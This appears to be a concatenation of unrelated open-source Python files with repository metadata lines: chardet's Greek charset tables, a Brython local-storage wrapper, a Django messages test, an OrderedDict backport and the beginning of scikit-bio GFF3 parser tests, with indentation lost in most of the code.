35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15, # d0
124, 1, 29, 20, 21, 3, 32, 13, 25, 5, 11, 16, 10, 6, 30, 4, # e0
9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0
)
win1253_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85, # 40
79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253, # 50
253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55, # 60
78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253, # 70
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 80
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 90
253,233, 61,253,253,253,253,253,253,253,253,253,253, 74,253,253, # a0
253,253,253,253,247,253,253, 36, 46, 71, 73,253, 54,253,108,123, # b0
110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39, # c0
35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15, # d0
124, 1, 29, 20, 21, 3, 32, 13, 25, 5, 11, 16, 10, 6, 30, 4, # e0
9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 98.2851%
# first 1024 sequences:1.7001%
# rest sequences: 0.0359%
# negative sequences: 0.0148%
GreekLangModel = (
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0,
3,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,0,3,3,0,3,2,3,3,0,3,2,3,3,3,0,0,3,0,3,0,3,3,2,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,
0,2,3,2,2,3,3,3,3,3,3,3,3,0,3,3,3,3,0,2,3,3,0,3,3,3,3,2,3,3,3,0,
2,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,2,1,3,3,3,3,2,3,3,2,3,3,2,0,
0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,2,3,3,0,
2,0,1,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,2,3,0,0,0,0,3,3,0,3,1,3,3,3,0,3,3,0,3,3,3,3,0,0,0,0,
2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,0,3,0,3,3,3,3,3,0,3,2,2,2,3,0,2,3,3,3,3,3,2,3,3,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,3,2,2,2,3,3,3,3,0,3,1,3,3,3,3,2,3,3,3,3,3,3,3,2,2,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,2,0,3,0,0,0,3,3,2,3,3,3,3,3,0,0,3,2,3,0,2,3,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,3,0,0,3,3,0,2,3,0,3,0,3,3,3,0,0,3,0,3,0,2,2,3,3,0,0,
0,0,1,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,2,0,3,2,3,3,3,3,0,3,3,3,3,3,0,3,3,2,3,2,3,3,2,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,2,3,2,3,3,3,3,3,3,0,2,3,2,3,2,2,2,3,2,3,3,2,3,0,2,2,2,3,0,
2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,0,0,0,3,3,3,2,3,3,0,0,3,0,3,0,0,0,3,2,0,3,0,3,0,0,2,0,2,0,
0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,0,0,0,3,3,0,3,3,3,0,0,1,2,3,0,
3,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,2,0,0,3,2,2,3,3,0,3,3,3,3,3,2,1,3,0,3,2,3,3,2,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,3,0,2,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,3,0,3,2,3,0,0,3,3,3,0,
3,0,0,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,0,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,2,0,3,2,3,0,0,3,2,3,0,
2,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,1,2,2,3,3,3,3,3,3,0,2,3,0,3,0,0,0,3,3,0,3,0,2,0,0,2,3,1,0,
2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,3,0,3,0,3,3,2,3,0,3,3,3,3,3,3,0,3,3,3,0,2,3,0,0,3,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,0,0,3,0,0,0,3,3,0,3,0,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,0,0,0,3,3,3,3,3,3,0,0,3,0,2,0,0,0,3,3,0,3,0,3,0,0,2,0,2,0,
0,0,0,0,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,3,0,3,0,2,0,3,2,0,3,2,3,2,3,0,0,3,2,3,2,3,3,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,0,0,2,3,3,3,3,3,0,0,0,3,0,2,1,0,0,3,2,2,2,0,3,0,0,2,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,2,0,3,0,3,0,3,3,0,2,1,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,3,3,3,0,3,3,3,3,3,3,0,2,3,0,3,0,0,0,2,1,0,2,2,3,0,0,2,2,2,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,0,0,2,3,3,3,2,3,0,0,1,3,0,2,0,0,0,0,3,0,1,0,2,0,0,1,1,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,1,0,3,0,0,0,3,2,0,3,2,3,3,3,0,0,3,0,3,2,2,2,1,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,0,0,3,0,0,0,0,2,0,2,3,3,2,2,2,2,3,0,2,0,2,2,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,2,0,0,0,0,0,0,2,3,0,2,0,2,3,2,0,0,3,0,3,0,3,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,3,2,3,3,2,2,3,0,2,0,3,0,0,0,2,0,0,0,0,1,2,0,2,0,2,0,
0,2,0,2,0,2,2,0,0,1,0,2,2,2,0,2,2,2,0,2,2,2,0,0,2,0,0,1,0,0,0,0,
0,2,0,3,3,2,0,0,0,0,0,0,1,3,0,2,0,2,2,2,0,0,2,0,3,0,0,2,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,2,3,2,0,2,2,0,2,0,2,2,0,2,0,2,2,2,0,0,0,0,0,0,2,3,0,0,0,2,
0,1,2,0,0,0,0,2,2,0,0,0,2,1,0,2,2,0,0,0,0,0,0,1,0,2,0,0,0,0,0,0,
0,0,2,1,0,2,3,2,2,3,2,3,2,0,0,3,3,3,0,0,3,2,0,0,0,1,1,0,2,0,2,2,
0,2,0,2,0,2,2,0,0,2,0,2,2,2,0,2,2,2,2,0,0,2,0,0,0,2,0,1,0,0,0,0,
0,3,0,3,3,2,2,0,3,0,0,0,2,2,0,2,2,2,1,2,0,0,1,2,2,0,0,3,0,0,0,2,
0,1,2,0,0,0,1,2,0,0,0,0,0,0,0,2,2,0,1,0,0,2,0,0,0,2,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,3,3,2,2,0,0,0,2,0,2,3,3,0,2,0,0,0,0,0,0,2,2,2,0,2,2,0,2,0,2,
0,2,2,0,0,2,2,2,2,1,0,0,2,2,0,2,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,
0,2,0,3,2,3,0,0,0,3,0,0,2,2,0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,0,2,
0,0,2,2,0,0,2,2,2,0,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,3,2,0,2,2,2,2,2,0,0,0,2,0,0,0,0,2,0,1,0,0,2,0,1,0,0,0,
0,2,2,2,0,2,2,0,1,2,0,2,2,2,0,2,2,2,2,1,2,2,0,0,2,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,2,0,2,0,2,2,0,0,0,0,1,2,1,0,0,2,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,3,2,3,0,0,2,0,0,0,2,2,0,2,0,0,0,1,0,0,2,0,2,0,2,2,0,0,0,0,
0,0,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,
0,2,2,3,2,2,0,0,0,0,0,0,1,3,0,2,0,2,2,0,0,0,1,0,2,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,0,2,0,3,2,0,2,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,2,0,0,0,0,1,1,0,0,2,1,2,0,2,2,0,1,0,0,1,0,0,0,2,0,0,0,0,0,0,
0,3,0,2,2,2,0,0,2,0,0,0,2,0,0,0,2,3,0,2,0,0,0,0,0,0,2,2,0,0,0,2,
0,1,2,0,0,0,1,2,2,1,0,0,0,2,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,1,2,0,2,2,0,2,0,0,2,0,0,0,0,1,2,1,0,2,1,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,0,3,1,2,2,0,2,0,0,0,0,2,0,0,0,2,0,0,3,0,0,0,0,2,2,2,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,1,0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,2,
0,2,2,0,0,2,2,2,2,2,0,1,2,0,0,0,2,2,0,1,0,2,0,0,2,2,0,0,0,0,0,0,
0,0,0,0,1,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,0,0,0,0,2,0,2,0,0,0,0,2,
0,1,2,0,0,0,0,2,2,1,0,1,0,1,0,2,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,
0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,2,0,0,2,2,0,0,0,0,1,0,0,0,0,0,0,2,
0,2,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0,
0,2,2,2,2,0,0,0,3,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,1,
0,0,2,0,0,0,0,1,2,0,0,0,0,0,0,2,2,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,
0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,2,2,2,0,0,0,2,0,0,0,0,0,0,0,0,2,
0,0,1,0,0,0,0,2,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
0,3,0,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,2,
0,0,2,0,0,0,0,2,2,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,0,2,2,1,0,0,0,0,0,0,2,0,0,2,0,2,2,2,0,0,0,0,0,0,2,0,0,0,0,2,
0,0,2,0,0,2,0,2,2,0,0,0,0,2,0,2,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0,
0,0,3,0,0,0,2,2,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0,0,0,
0,2,2,2,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,
0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,2,0,0,0,2,0,0,0,0,0,1,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,2,0,0,0,
0,2,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,2,0,2,0,0,0,
0,0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,1,2,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
Latin7GreekModel = {
'charToOrderMap': Latin7_CharToOrderMap,
'precedenceMatrix': GreekLangModel,
'mTypicalPositiveRatio': 0.982851,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-7"
}
Win1253GreekModel = {
'charToOrderMap': win1253_CharToOrderMap,
'precedenceMatrix': GreekLangModel,
'mTypicalPositiveRatio': 0.982851,
'keepEnglishLetter': False,
'charsetName': "windows-1253"
}
# flake8: noqa
| artistic-2.0 |
40223149/2015springcda | static/Brython3.1.1-20150328-091302/Lib/browser/local_storage.py | 617 | 2786 | # local storage in browser
import sys
from javascript import JSObject
class __UnProvided():
pass
class LocalStorage():
storage_type = "local_storage"
def __init__(self):
if not sys.has_local_storage:
raise EnvironmentError("LocalStorage not available")
self.store = JSObject(__BRYTHON__.local_storage)
def __delitem__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if key not in self:
raise KeyError(key)
self.store.removeItem(key)
def __getitem__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
res = __BRYTHON__.JSObject(self.store.getItem(key))
if res:
return res
raise KeyError(key)
def __setitem__(self, key, value):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if (not isinstance(value, str)):
raise TypeError("value must be string")
self.store.setItem(key, value)
# implement "in" functionality
def __contains__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
res = __BRYTHON__.JSObject(self.store.getItem(key))
if res is None:
return False
return True
def __iter__(self):
keys = self.keys()
return keys.__iter__()
def get(self, key, default=None):
if (not isinstance(key, str)):
raise TypeError("key must be string")
return __BRYTHON__.JSObject(self.store.getItem(key)) or default
def pop(self, key, default=__UnProvided()):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if type(default) is __UnProvided:
ret = self.get(key)
del self[key] # will throw key error if doesn't exist
return ret
else:
if key in self:
ret = self.get(key)
del self[key]
return ret
else:
return default
    # while a real dict provides a view, returning a generator would be less helpful
    # than simply returning a list, and creating a custom iterator is overkill and
    # would likely result in slower performance
def keys(self):
return [__BRYTHON__.JSObject(self.store.key(i)) for i in range(self.store.length)]
def values(self):
return [__BRYTHON__.JSObject(self.__getitem__(k)) for k in self.keys()]
def items(self):
return list(zip(self.keys(), self.values()))
def clear(self):
self.store.clear()
def __len__(self):
return self.store.length
if sys.has_local_storage:
storage = LocalStorage()
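# Hedged usage sketch (not from the original module); illustrative only and
# assumes a Brython page where local storage is available:
#   from browser.local_storage import storage
#   storage['counter'] = '1'              # keys and values must be str
#   print(storage.get('counter', '0'))
#   del storage['counter']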
| gpl-3.0 |
jeezybrick/django | tests/messages_tests/test_api.py | 337 | 1453 | from django.contrib import messages
from django.test import RequestFactory, SimpleTestCase
class DummyStorage(object):
"""
dummy message-store to test the api methods
"""
def __init__(self):
self.store = []
def add(self, level, message, extra_tags=''):
self.store.append(message)
class ApiTest(SimpleTestCase):
def setUp(self):
self.rf = RequestFactory()
self.request = self.rf.request()
self.storage = DummyStorage()
def test_ok(self):
msg = 'some message'
self.request._messages = self.storage
messages.add_message(self.request, messages.DEBUG, msg)
self.assertIn(msg, self.storage.store)
def test_request_is_none(self):
msg = 'some message'
self.request._messages = self.storage
with self.assertRaises(TypeError):
messages.add_message(None, messages.DEBUG, msg)
self.assertEqual([], self.storage.store)
def test_middleware_missing(self):
msg = 'some message'
with self.assertRaises(messages.MessageFailure):
messages.add_message(self.request, messages.DEBUG, msg)
self.assertEqual([], self.storage.store)
def test_middleware_missing_silently(self):
msg = 'some message'
messages.add_message(self.request, messages.DEBUG, msg,
fail_silently=True)
self.assertEqual([], self.storage.store)
| bsd-3-clause |
wakatime/sublime-wakatime | packages/wakatime/packages/ordereddict.py | 254 | 4221 | # Copyright (c) 2009 Raymond Hettinger
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.__map = {} # key --> [key, prev, next]
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
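# Hedged usage sketch (not from the original recipe): a drop-in for Python
# versions before 2.7, where collections.OrderedDict is unavailable; iteration
# follows insertion order:
#   d = OrderedDict([('b', 1), ('a', 2)])
#   d.keys()     -> ['b', 'a']
#   d.popitem()  -> ('a', 2)   # last=True pops the most recently added pair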
| bsd-3-clause |
gregcaporaso/scikit-bio | skbio/io/format/tests/test_gff3.py | 4 | 13406 | # ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import TestCase, main
import io
from skbio.util import get_data_path
from skbio.metadata import IntervalMetadata
from skbio import DNA, Sequence
from skbio.io import GFF3FormatError
from skbio.io.format.gff3 import (_yield_record,
_parse_record,
_parse_attr,
_gff3_sniffer,
_gff3_to_interval_metadata,
_interval_metadata_to_gff3,
_gff3_to_generator,
_generator_to_gff3,
_gff3_to_sequence,
_sequence_to_gff3,
_gff3_to_dna,
_dna_to_gff3,
_serialize_interval_metadata)
class GFF3IOTests(TestCase):
def setUp(self):
self.multi_fp = get_data_path('gff3_multi_record')
self.single_fp = get_data_path('gff3_single_record')
intvls = [{'bounds': [(0, 4641652)],
'metadata': {'source': 'European Nucleotide Archive',
'type': 'chromosome',
'score': '.',
'strand': '.',
'ID': 'chromosome:Chromosome',
'Alias': 'U00096.3',
'Is_circular': 'true'}},
{'bounds': [(147, 148)],
'metadata': {'source': 'regulondb_feature',
'type': 'biological_region',
'score': '.',
'strand': '+',
'external_name':
'Promoter thrLp (RegulonDB:ECK120010236)',
'logic_name': 'regulondb_promoter'}},
{'bounds': [(336, 2799)],
'metadata': {'source': 'Prodigal_v2.60',
'type': 'gene',
'score': '1.8',
'strand': '+',
'phase': 0,
'ID': '1_1',
'gc_cont': '0.427'}},
{'bounds': [(336, 2799)],
'metadata': {'source': 'Prodigal_v2.60',
'type': 'CDS',
'score': '333.8',
'strand': '+',
'phase': 0,
'ID': '1_2',
'Parent': '1_1',
'rbs_motif': 'GGAG/GAGG',
'rbs_spacer': '5-10bp'}},
{'bounds': [(0, 50), (55, 100)],
'metadata': {'source': 'Prodigal_v2.60',
'type': 'gene',
'score': '1.8',
'strand': '+',
'phase': 0,
'ID': '1_1',
'gene': 'FXR receptor'}}]
self.upper_bound = 4641652
self.imd1 = IntervalMetadata(self.upper_bound)
self.imd1.add(**intvls[0])
self.imd1.add(**intvls[1])
self.imd2 = IntervalMetadata(None)
self.imd2.add(**intvls[2])
self.imd2.add(**intvls[3])
self.imd3 = IntervalMetadata(None)
self.imd3.add(**intvls[4])
self.seq_fp = get_data_path('gff3_dna')
self.seq = Sequence('ATGCATGCATGC',
metadata={'id': 'NC_1',
'description': 'species X'})
self.seq.interval_metadata.add(
[(0, 9)],
metadata={'source': 'Prodigal_v2.60',
'type': 'gene',
'score': '.',
'strand': '+',
'phase': 0,
'ID': 'gene1',
'Name': 'FXR'})
self.dna = DNA(self.seq)
class SnifferTests(TestCase):
def setUp(self):
self.positive_fps = map(get_data_path, [
'gff3_multi_record',
'gff3_single_record',
'gff3_dna'])
self.negative_fps = map(get_data_path, [
'empty',
'whitespace_only',
'gff3_bad_missing_directive'])
def test_positive(self):
for fp in self.positive_fps:
self.assertEqual(_gff3_sniffer(fp), (True, {}))
def test_negative(self):
for fp in self.negative_fps:
self.assertEqual(_gff3_sniffer(fp), (False, {}))
class ReaderTests(GFF3IOTests):
def test_parse_attr(self):
s = 'Dbxref=GO:000152,GO:001234;Note=fooo'
obs = _parse_attr(s)
exp = {'db_xref': 'GO:000152,GO:001234', 'note': 'fooo'}
self.assertEqual(exp, obs)
def test_yield_record(self):
obs = [('data', 'seqid1', ['seqid1\txxx', 'seqid1\tyyy']),
('data', 'seqid2', ['seqid2\tzzz'])]
s = ('seqid1\txxx\n'
'seqid1\tyyy\n'
'seqid2\tzzz\n')
fh = io.StringIO(s)
for i, j in zip(_yield_record(fh), obs):
self.assertEqual(i, j)
def test_parse_record_raise(self):
chars = 'abc?!'
for char in chars:
lines = [
'ctg123\t.\tgene\t1000\t9000\t.\t+\t%s\tID=gene00001' % char]
with self.assertRaisesRegex(
GFF3FormatError,
r"unknown value for phase column: '%s'" % char):
_parse_record(lines, 10000)
def test_yield_record_raise(self):
s = '##gff-version 3\nseq_1 . gene 1 3 . + . ID=gene01\n'
with io.StringIO(s) as fh:
with self.assertRaises(GFF3FormatError):
list(_yield_record(fh))
def test_gff3_to_interval_metadata(self):
obs = _gff3_to_interval_metadata(
self.single_fp, seq_id='Chromosome')
self.assertEqual(obs, self.imd1)
def test_gff3_to_interval_metadata_empty(self):
exp = IntervalMetadata(None)
obs = _gff3_to_interval_metadata(
